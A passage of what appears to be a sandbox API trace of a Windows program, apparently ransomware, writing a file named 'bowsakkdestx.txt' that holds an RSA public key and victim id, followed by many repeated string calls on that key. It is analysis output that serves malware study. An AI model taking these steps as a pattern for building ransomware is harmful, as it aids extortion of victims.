CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa670, cbMultiByte=-1, lpWideCharStr=0x6b7fb0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0041.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfdaa47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0041.752] GetFileType (hFile=0x3b4) returned 0x1 [0041.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0041.752] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 558 [0041.752] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1000) returned 0x326f8d8 [0041.752] WriteFile (in: hFile=0x3b4, lpBuffer=0xfda9118*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0xfda8a44, lpOverlapped=0x0 | out: lpBuffer=0xfda9118*, lpNumberOfBytesWritten=0xfda8a44*=0x22e, lpOverlapped=0x0) returned 1 [0041.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f8d8 | out: hHeap=0x660000) returned 1 [0041.753] CloseHandle (hObject=0x3b4) returned 1 [0041.754] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0041.755] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0041.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3266ff0 | out: hHeap=0x660000) returned 1 [0041.755] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0041.755] lstrcpyA (in: lpString1=0xfdaab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.755] lstrcpyA (in: lpString1=0xfdaa778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0041.755] lstrlenA (lpString="-----BEGIN PUBLIC 